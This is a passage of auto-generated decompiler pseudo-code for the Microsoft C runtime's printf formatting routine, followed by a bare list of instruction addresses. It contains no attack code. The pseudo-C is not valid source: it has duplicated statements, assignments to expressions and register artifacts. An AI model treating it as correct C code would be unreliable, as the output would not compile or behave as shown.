																							__edx =  *((char*)(__ebp - 0x251));
																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
																								__eax =  *(__ebp - 0x18);
																								__eax =  *(__ebp - 0x18) * 0xa;
																								__ecx =  *((char*)(__ebp - 0x251));
																								_t96 = __ecx - 0x30; // -48
																								__edx = __eax + _t96;
																								 *(__ebp - 0x18) = __eax + _t96;
																							} else {
																								__eax = __ebp + 0x14;
																								 *(__ebp - 0x18) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x18) < 0) {
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00000004;
																									 *(__ebp - 0x10) = __ecx;
																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																									 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
																								}
																							}
																							goto L218;
																						case 4:
																							L40:
																							 *(__ebp - 0x30) = 0;
																							goto L218;
																						case 5:
																							L41:
																							__eax =  *((char*)(__ebp - 0x251));
																							if( *((char*)(__ebp - 0x251)) != 0x2a) {
																								 *(__ebp - 0x30) =  *(__ebp - 0x30) * 0xa;
																								_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
																								__ecx =  *(__ebp - 0x30) * 0xa + _t107;
																								 *(__ebp - 0x30) = __ecx;
																							} else {
																								__ecx = __ebp + 0x14;
																								 *(__ebp - 0x30) = E0041F270(__ebp + 0x14);
																								if( *(__ebp - 0x30) < 0) {
																									 *(__ebp - 0x30) = 0xffffffff;
																								}
																							}
																							goto L218;
																						case 6:
																							L47:
																							__edx =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																							 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
																							if( *(__ebp - 0x320) > 0x2e) {
																								L70:
																								goto L218;
																							}
																							L48:
																							__ecx =  *(__ebp - 0x320);
																							_t115 = __ecx + 0x422b10; // 0x231e9003
																							__edx =  *_t115 & 0x000000ff;
																							switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M00422AFC))) {
																								case 0:
																									L53:
																									__edx =  *(__ebp + 0xc);
																									__eax =  *( *(__ebp + 0xc));
																									if( *( *(__ebp + 0xc)) != 0x36) {
																										L56:
																										__edx =  *(__ebp + 0xc);
																										__eax =  *( *(__ebp + 0xc));
																										if( *( *(__ebp + 0xc)) != 0x33) {
																											L59:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc));
																											if( *( *(__ebp + 0xc)) == 0x64) {
																												L65:
																												L67:
																												goto L70;
																											}
																											L60:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx;
																											if( *__ecx == 0x69) {
																												goto L65;
																											}
																											L61:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc));
																											if(__ecx == 0x6f) {
																												goto L65;
																											}
																											L62:
																											__edx =  *(__ebp + 0xc);
																											__eax =  *( *(__ebp + 0xc));
																											if( *( *(__ebp + 0xc)) == 0x75) {
																												goto L65;
																											}
																											L63:
																											__ecx =  *(__ebp + 0xc);
																											__edx =  *__ecx;
																											if( *__ecx == 0x78) {
																												goto L65;
																											}
																											L64:
																											__eax =  *(__ebp + 0xc);
																											__ecx =  *( *(__ebp + 0xc));
																											if(__ecx != 0x58) {
																												L66:
																												 *(__ebp - 0x25c) = 0;
																												goto L18;
																											}
																											goto L65;
																										}
																										L57:
																										__ecx =  *(__ebp + 0xc);
																										__edx =  *((char*)(__ecx + 1));
																										if( *((char*)(__ecx + 1)) != 0x32) {
																											goto L59;
																										}
																										L58:
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																										__ecx =  *(__ebp - 0x10);
																										__ecx =  *(__ebp - 0x10) & 0xffff7fff;
																										 *(__ebp - 0x10) = __ecx;
																										goto L67;
																									}
																									L54:
																									__ecx =  *(__ebp + 0xc);
																									__edx =  *((char*)(__ecx + 1));
																									if( *((char*)(__ecx + 1)) != 0x34) {
																										goto L56;
																									}
																									L55:
																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																									 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
																									__ecx =  *(__ebp - 0x10);
																									__ecx =  *(__ebp - 0x10) | 0x00008000;
																									 *(__ebp - 0x10) = __ecx;
																									goto L67;
																								case 1:
																									L68:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
																									goto L70;
																								case 2:
																									L49:
																									__eax =  *(__ebp + 0xc);
																									__ecx =  *( *(__ebp + 0xc));
																									if(__ecx != 0x6c) {
																										__ecx =  *(__ebp - 0x10);
																										__ecx =  *(__ebp - 0x10) | 0x00000010;
																										 *(__ebp - 0x10) = __ecx;
																									} else {
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																										 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																										 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
																									}
																									goto L70;
																								case 3:
																									L69:
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																									goto L70;
																								case 4:
																									goto L70;
																							}
																						case 7:
																							goto L71;
																						case 8:
																							L30:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
																							goto L33;
																						case 9:
																							L31:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
																							goto L33;
																						case 0xa:
																							L29:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000001;
																							 *(__ebp - 0x10) = __ecx;
																							goto L33;
																						case 0xb:
																							L28:
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
																							goto L33;
																						case 0xc:
																							L32:
																							__ecx =  *(__ebp - 0x10);
																							__ecx =  *(__ebp - 0x10) | 0x00000008;
																							 *(__ebp - 0x10) = __ecx;
																							goto L33;
																						case 0xd:
																							L33:
																							goto L218;
																					}
																				} else {
																					if(0 == 0) {
																						 *(_t699 - 0x314) = 0;
																					} else {
																						 *(_t699 - 0x314) = 1;
																					}
																					_t616 =  *(_t699 - 0x314);
																					 *(_t699 - 0x278) =  *(_t699 - 0x314);
																					if( *(_t699 - 0x278) == 0) {
																						_push(L"(\"Incorrect format specifier\", 0)");
																						_push(0);
																						_push(0x460);
																						_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																						_push(2);
																						_t545 = L0040C820();
																						_t702 = _t702 + 0x14;
																						if(_t545 == 1) {
																							asm("int3");
																						}
																					}
																					L14:
																					if( *(_t699 - 0x278) != 0) {
																						goto L16;
																					} else {
																						 *((intOrPtr*)(L00411810(_t616))) = 0x16;
																						E0040C660(_t589, _t616, _t697, _t698, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
																						 *(_t699 - 0x2f0) = 0xffffffff;
																						E00410370(_t699 - 0x40);
																						_t518 =  *(_t699 - 0x2f0);
																						L229:
																						return E00410900(_t518, _t589,  *(_t699 - 0x48) ^ _t699, _t663, _t697, _t698);
																					}
																				}
																			}
																			L219:
																			if( *(_t699 - 0x25c) == 0 ||  *(_t699 - 0x25c) == 7) {
																				 *(_t699 - 0x334) = 1;
																			} else {
																				 *(_t699 - 0x334) = 0;
																			}
																			_t603 =  *(_t699 - 0x334);
																			 *(_t699 - 0x2e0) =  *(_t699 - 0x334);
																			if( *(_t699 - 0x2e0) == 0) {
																				_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
																				_push(0);
																				_push(0x8f5);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				_t523 = L0040C820();
																				_t702 = _t702 + 0x14;
																				if(_t523 == 1) {
																					asm("int3");
																				}
																			}
																			if( *(_t699 - 0x2e0) != 0) {
																				 *(_t699 - 0x300) =  *(_t699 - 0x24c);
																				E00410370(_t699 - 0x40);
																				_t518 =  *(_t699 - 0x300);
																			} else {
																				 *((intOrPtr*)(L00411810(_t603))) = 0x16;
																				E0040C660(_t589, _t603, _t697, _t698, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
																				 *(_t699 - 0x2fc) = 0xffffffff;
																				E00410370(_t699 - 0x40);
																				_t518 =  *(_t699 - 0x2fc);
																			}
																			goto L229;
																		}
																		L191:
																		if(( *(_t699 - 0x10) & 0x00000040) != 0) {
																			if(( *(_t699 - 0x10) & 0x00000100) == 0) {
																				if(( *(_t699 - 0x10) & 0x00000001) == 0) {
																					if(( *(_t699 - 0x10) & 0x00000002) != 0) {
																						 *((char*)(_t699 - 0x14)) = 0x20;
																						 *(_t699 - 0x1c) = 1;
																					}
																				} else {
																					 *((char*)(_t699 - 0x14)) = 0x2b;
																					 *(_t699 - 0x1c) = 1;
																				}
																			} else {
																				 *((char*)(_t699 - 0x14)) = 0x2d;
																				 *(_t699 - 0x1c) = 1;
																			}
																		}
																		 *((intOrPtr*)(_t699 - 0x2c4)) =  *((intOrPtr*)(_t699 - 0x18)) -  *((intOrPtr*)(_t699 - 0x24)) -  *(_t699 - 0x1c);
																		if(( *(_t699 - 0x10) & 0x0000000c) == 0) {
																			E00422C60(0x20,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																			_t702 = _t702 + 0x10;
																		}
																		E00422CA0( *(_t699 - 0x1c), _t699 - 0x14,  *(_t699 - 0x1c),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																		_t702 = _t702 + 0x10;
																		if(( *(_t699 - 0x10) & 0x00000008) != 0 && ( *(_t699 - 0x10) & 0x00000004) == 0) {
																			E00422C60(0x30,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																			_t702 = _t702 + 0x10;
																		}
																		if( *(_t699 - 0xc) == 0 ||  *((intOrPtr*)(_t699 - 0x24)) <= 0) {
																			L212:
																			E00422CA0( *((intOrPtr*)(_t699 - 4)),  *((intOrPtr*)(_t699 - 4)),  *((intOrPtr*)(_t699 - 0x24)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																			_t702 = _t702 + 0x10;
																			goto L213;
																		} else {
																			L205:
																			 *(_t699 - 0x2dc) = 0;
																			 *((intOrPtr*)(_t699 - 0x2c8)) =  *((intOrPtr*)(_t699 - 4));
																			 *((intOrPtr*)(_t699 - 0x2cc)) =  *((intOrPtr*)(_t699 - 0x24));
																			while(1) {
																				L206:
																				 *((intOrPtr*)(_t699 - 0x2cc)) =  *((intOrPtr*)(_t699 - 0x2cc)) - 1;
																				if( *((intOrPtr*)(_t699 - 0x2cc)) == 0) {
																					break;
																				}
																				L207:
																				 *(_t699 - 0x32e) =  *((intOrPtr*)( *((intOrPtr*)(_t699 - 0x2c8))));
																				_t563 = E00424E90(_t699 - 0x2d0, _t699 - 0x2d8, 6,  *(_t699 - 0x32e) & 0x0000ffff);
																				_t702 = _t702 + 0x10;
																				 *(_t699 - 0x2dc) = _t563;
																				 *((intOrPtr*)(_t699 - 0x2c8)) =  *((intOrPtr*)(_t699 - 0x2c8)) + 2;
																				if( *(_t699 - 0x2dc) != 0 ||  *((intOrPtr*)(_t699 - 0x2d0)) == 0) {
																					L209:
																					 *(_t699 - 0x24c) = 0xffffffff;
																					break;
																				} else {
																					L210:
																					E00422CA0( *((intOrPtr*)(_t699 + 8)), _t699 - 0x2d8,  *((intOrPtr*)(_t699 - 0x2d0)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																					_t702 = _t702 + 0x10;
																					continue;
																				}
																			}
																			L211:
																			L213:
																			if( *(_t699 - 0x24c) >= 0 && ( *(_t699 - 0x10) & 0x00000004) != 0) {
																				E00422C60(0x20,  *((intOrPtr*)(_t699 - 0x2c4)),  *((intOrPtr*)(_t699 + 8)), _t699 - 0x24c);
																				_t702 = _t702 + 0x10;
																			}
																			goto L216;
																		}
																		L71:
																		__ecx =  *((char*)(__ebp - 0x251));
																		 *(__ebp - 0x324) = __ecx;
																		__edx =  *(__ebp - 0x324);
																		__edx =  *(__ebp - 0x324) - 0x41;
																		 *(__ebp - 0x324) = __edx;
																	} while ( *(__ebp - 0x324) > 0x37);
																	_t156 =  *(__ebp - 0x324) + 0x422b7c; // 0xcccccc0d
																	__ecx =  *_t156 & 0x000000ff;
																	switch( *((intOrPtr*)(__ecx * 4 +  &M00422B40))) {
																		case 0:
																			L123:
																			 *(__ebp - 0x2c) = 1;
																			__ecx =  *((char*)(__ebp - 0x251));
																			__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
																			 *((char*)(__ebp - 0x251)) = __cl;
																			goto L124;
																		case 1:
																			L73:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																			}
																			goto L75;
																		case 2:
																			L88:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
																			if(( *(__ebp - 0x10) & 0x00000830) == 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000800;
																			}
																			goto L90;
																		case 3:
																			L146:
																			 *((intOrPtr*)(__ebp - 0x260)) = 7;
																			goto L148;
																		case 4:
																			L81:
																			__eax = __ebp + 0x14;
																			 *(__ebp - 0x288) = E0041F270(__ebp + 0x14);
																			if( *(__ebp - 0x288) == 0) {
																				L83:
																				__edx =  *0x4bc060; // 0x408114
																				 *(__ebp - 4) = __edx;
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																				L87:
																				goto L190;
																			}
																			L82:
																			__ecx =  *(__ebp - 0x288);
																			if( *((intOrPtr*)( *(__ebp - 0x288) + 4)) != 0) {
																				L84:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
																				if(( *(__ebp - 0x10) & 0x00000800) == 0) {
																					 *(__ebp - 0xc) = 0;
																					__edx =  *(__ebp - 0x288);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x288);
																					__edx =  *__ecx;
																					 *(__ebp - 0x24) =  *__ecx;
																				} else {
																					__edx =  *(__ebp - 0x288);
																					__eax =  *(__edx + 4);
																					 *(__ebp - 4) =  *(__edx + 4);
																					__ecx =  *(__ebp - 0x288);
																					__eax =  *__ecx;
																					asm("cdq");
																					 *__ecx - __edx =  *__ecx - __edx >> 1;
																					 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
																					 *(__ebp - 0xc) = 1;
																				}
																				goto L87;
																			}
																			goto L83;
																		case 5:
																			L124:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			__eax = __ebp - 0x248;
																			 *(__ebp - 4) = __ebp - 0x248;
																			 *(__ebp - 0x44) = 0x200;
																			if( *(__ebp - 0x30) >= 0) {
																				L126:
																				if( *(__ebp - 0x30) != 0) {
																					L129:
																					if( *(__ebp - 0x30) > 0x200) {
																						 *(__ebp - 0x30) = 0x200;
																					}
																					L131:
																					if( *(__ebp - 0x30) > 0xa3) {
																						 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																						 *(__ebp - 0x20) = L0040E5B0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
																						if( *(__ebp - 0x20) == 0) {
																							 *(__ebp - 0x30) = 0xa3;
																						} else {
																							__eax =  *(__ebp - 0x20);
																							 *(__ebp - 4) =  *(__ebp - 0x20);
																							 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
																							 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
																						}
																					}
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
																					__eax =  *(__ebp + 0x14);
																					__ecx =  *(__eax - 8);
																					__edx =  *(__eax - 4);
																					 *(__ebp - 0x2a8) =  *(__eax - 8);
																					 *(__ebp - 0x2a4) =  *(__eax - 4);
																					__ecx = __ebp - 0x40;
																					_push(E004103A0(__ebp - 0x40));
																					__eax =  *(__ebp - 0x2c);
																					_push( *(__ebp - 0x2c));
																					__ecx =  *(__ebp - 0x30);
																					_push( *(__ebp - 0x30));
																					__edx =  *((char*)(__ebp - 0x251));
																					_push( *((char*)(__ebp - 0x251)));
																					__eax =  *(__ebp - 0x44);
																					_push( *(__ebp - 0x44));
																					__ecx =  *(__ebp - 4);
																					_push( *(__ebp - 4));
																					__edx = __ebp - 0x2a8;
																					_push(__ebp - 0x2a8);
																					__eax =  *0x4bb808; // 0x776010b9
																					__eax =  *__eax();
																					__esp = __esp + 0x1c;
																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																					if(( *(__ebp - 0x10) & 0x00000080) != 0 &&  *(__ebp - 0x30) == 0) {
																						__ecx = __ebp - 0x40;
																						_push(E004103A0(__ebp - 0x40));
																						__edx =  *(__ebp - 4);
																						_push( *(__ebp - 4));
																						__eax =  *0x4bb814; // 0x776010b9
																						__eax =  *__eax();
																						__esp = __esp + 8;
																					}
																					__ecx =  *((char*)(__ebp - 0x251));
																					if( *((char*)(__ebp - 0x251)) == 0x67) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																						if(( *(__ebp - 0x10) & 0x00000080) == 0) {
																							__ecx = __ebp - 0x40;
																							_push(E004103A0(__ebp - 0x40));
																							__eax =  *(__ebp - 4);
																							_push( *(__ebp - 4));
																							__ecx =  *0x4bb810; // 0x776010b9
																							E00411D00(__ecx) =  *__eax();
																							__esp = __esp + 8;
																						}
																					}
																					__edx =  *(__ebp - 4);
																					__eax =  *( *(__ebp - 4));
																					if( *( *(__ebp - 4)) == 0x2d) {
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																						 *(__ebp - 4) =  *(__ebp - 4) + 1;
																					}
																					__eax =  *(__ebp - 4);
																					 *(__ebp - 0x24) = E00410910( *(__ebp - 4));
																					goto L190;
																				}
																				L127:
																				__ecx =  *((char*)(__ebp - 0x251));
																				if(__ecx != 0x67) {
																					goto L129;
																				}
																				L128:
																				 *(__ebp - 0x30) = 1;
																				goto L131;
																			}
																			L125:
																			 *(__ebp - 0x30) = 6;
																			goto L131;
																		case 6:
																			L75:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																				__ebp + 0x14 = E0041F270(__ebp + 0x14);
																				 *(__ebp - 0x284) = __ax;
																				__cl =  *(__ebp - 0x284);
																				 *(__ebp - 0x248) = __cl;
																				 *(__ebp - 0x24) = 1;
																			} else {
																				 *(__ebp - 0x280) = 0;
																				__edx = __ebp + 0x14;
																				__eax = E00421650(__ebp + 0x14);
																				 *(__ebp - 0x258) = __ax;
																				__eax =  *(__ebp - 0x258) & 0x0000ffff;
																				__ecx = __ebp - 0x248;
																				__edx = __ebp - 0x24;
																				 *(__ebp - 0x280) = E00424E90(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
																				if( *(__ebp - 0x280) != 0) {
																					 *(__ebp - 0x28) = 1;
																				}
																			}
																			__edx = __ebp - 0x248;
																			 *(__ebp - 4) = __ebp - 0x248;
																			goto L190;
																		case 7:
																			L144:
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
																			 *(__ebp - 8) = 0xa;
																			goto L153;
																		case 8:
																			L109:
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 0x298) = E0041F270(__ebp + 0x14);
																			if(E00424120() != 0) {
																				L119:
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
																				if(( *(__ebp - 0x10) & 0x00000020) == 0) {
																					__edx =  *(__ebp - 0x298);
																					__eax =  *(__ebp - 0x24c);
																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																				} else {
																					__eax =  *(__ebp - 0x298);
																					 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
																				}
																				 *(__ebp - 0x28) = 1;
																				goto L190;
																			}
																			L110:
																			__edx = 0;
																			if(0 == 0) {
																				 *(__ebp - 0x32c) = 0;
																			} else {
																				 *(__ebp - 0x32c) = 1;
																			}
																			__eax =  *(__ebp - 0x32c);
																			 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
																			if( *(__ebp - 0x29c) == 0) {
																				_push(L"(\"\'n\' format specifier disabled\", 0)");
																				_push(0);
																				_push(0x695);
																				_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
																				_push(2);
																				__eax = L0040C820();
																				__esp = __esp + 0x14;
																				if(__eax == 1) {
																					asm("int3");
																				}
																			}
																			if( *(__ebp - 0x29c) != 0) {
																				L118:
																				goto L190;
																			} else {
																				L117:
																				 *((intOrPtr*)(L00411810(__ecx))) = 0x16;
																				__eax = E0040C660(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
																				 *(__ebp - 0x2f8) = 0xffffffff;
																				__ecx = __ebp - 0x40;
																				__eax = E00410370(__ecx);
																				__eax =  *(__ebp - 0x2f8);
																				goto L229;
																			}
																		case 9:
																			L151:
																			 *(__ebp - 8) = 8;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																				 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000200;
																			}
																			goto L153;
																		case 0xa:
																			L145:
																			 *(__ebp - 0x30) = 8;
																			goto L146;
																		case 0xb:
																			L90:
																			if( *(__ebp - 0x30) != 0xffffffff) {
																				__edx =  *(__ebp - 0x30);
																				 *(__ebp - 0x328) =  *(__ebp - 0x30);
																			} else {
																				 *(__ebp - 0x328) = 0x7fffffff;
																			}
																			__eax =  *(__ebp - 0x328);
																			 *(__ebp - 0x290) =  *(__ebp - 0x328);
																			__ecx = __ebp + 0x14;
																			 *(__ebp - 4) = E0041F270(__ebp + 0x14);
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
																			if(( *(__ebp - 0x10) & 0x00000810) == 0) {
																				L101:
																				if( *(__ebp - 4) == 0) {
																					__edx =  *0x4bc060; // 0x408114
																					 *(__ebp - 4) = __edx;
																				}
																				__eax =  *(__ebp - 4);
																				 *(__ebp - 0x28c) =  *(__ebp - 4);
																				while(1) {
																					L104:
																					__ecx =  *(__ebp - 0x290);
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					if(__ecx == 0) {
																						break;
																					}
																					L105:
																					__eax =  *(__ebp - 0x28c);
																					__ecx =  *( *(__ebp - 0x28c));
																					if(__ecx == 0) {
																						break;
																					}
																					L106:
																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																					 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
																				}
																				L107:
																				 *(__ebp - 0x28c) =  *(__ebp - 0x28c) -  *(__ebp - 4);
																				 *(__ebp - 0x24) =  *(__ebp - 0x28c) -  *(__ebp - 4);
																				goto L108;
																			} else {
																				L94:
																				if( *(__ebp - 4) == 0) {
																					__eax =  *0x4bc064; // 0x408104
																					 *(__ebp - 4) = __eax;
																				}
																				 *(__ebp - 0xc) = 1;
																				__ecx =  *(__ebp - 4);
																				 *(__ebp - 0x294) =  *(__ebp - 4);
																				while(1) {
																					L97:
																					__edx =  *(__ebp - 0x290);
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
																					if( *(__ebp - 0x290) == 0) {
																						break;
																					}
																					L98:
																					__ecx =  *(__ebp - 0x294);
																					__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
																					if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
																						break;
																					}
																					L99:
																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																					 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
																				}
																				L100:
																				 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
																				__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
																				 *(__ebp - 0x24) = __ecx;
																				L108:
																				goto L190;
																			}
																		case 0xc:
																			goto L0;
																		case 0xd:
																			L147:
																			 *((intOrPtr*)(__ebp - 0x260)) = 0x27;
																			L148:
																			 *(__ebp - 8) = 0x10;
																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
																			if(( *(__ebp - 0x10) & 0x00000080) != 0) {
																				 *((char*)(__ebp - 0x14)) = 0x30;
																				 *((intOrPtr*)(__ebp - 0x260)) =  *((intOrPtr*)(__ebp - 0x260)) + 0x51;
																				 *((char*)(__ebp - 0x13)) = __al;
																				 *(__ebp - 0x1c) = 2;
																			}
																			goto L153;
																		case 0xe:
																			goto L190;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x004224db
0x004224db
0x004224db
0x004224db
0x004224db
0x00000000
0x0042254a
0x00000000
0x0042254a
0x00000000
0x0042254a
0x0042254a
0x00422552
0x00422574
0x0042257a
0x0042259f
0x004225e6
0x004225e9
0x0042260a
0x0042260f
0x00422614
0x0042261a
0x004225eb
0x004225ef
0x004225f4
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a7
0x004225c9
0x004225ce
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225ad
0x004225b2
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x00422580
0x00422585
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422558
0x0042255d
0x00422560
0x00422566
0x00422566
0x00422626
0x00422668
0x0042266e
0x0042267a
0x00000000
0x00422628
0x00422628
0x00422628
0x0042262f
0x00000000
0x0042263c
0x0042263c
0x0042264a
0x0042264f
0x00422655
0x00422663
0x00422680
0x00422688
0x004226aa
0x004226aa
0x004226b4
0x004226c5
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226e4
0x004226e6
0x004226e6
0x004226f0
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x00422701
0x00000000
0x00000000
0x00422711
0x00422714
0x0042271e
0x0042272d
0x00422736
0x0042274c
0x00422752
0x0042275f
0x0042276d
0x0042276d
0x0042277c
0x00422784
0x00422784
0x0042278c
0x00422792
0x0042279b
0x004227a7
0x004227c0
0x004227c6
0x004227cf
0x004227cf
0x00000000
0x004227d2
0x00000000
0x004227d2
0x00000000
0x004227d2
0x00000000
0x004227d2
0x00000000
0x004227d2
0x00000000
0x004227d2
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x004229bd
0x004229c1
0x004229c9
0x004229ce
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d65
0x00000000
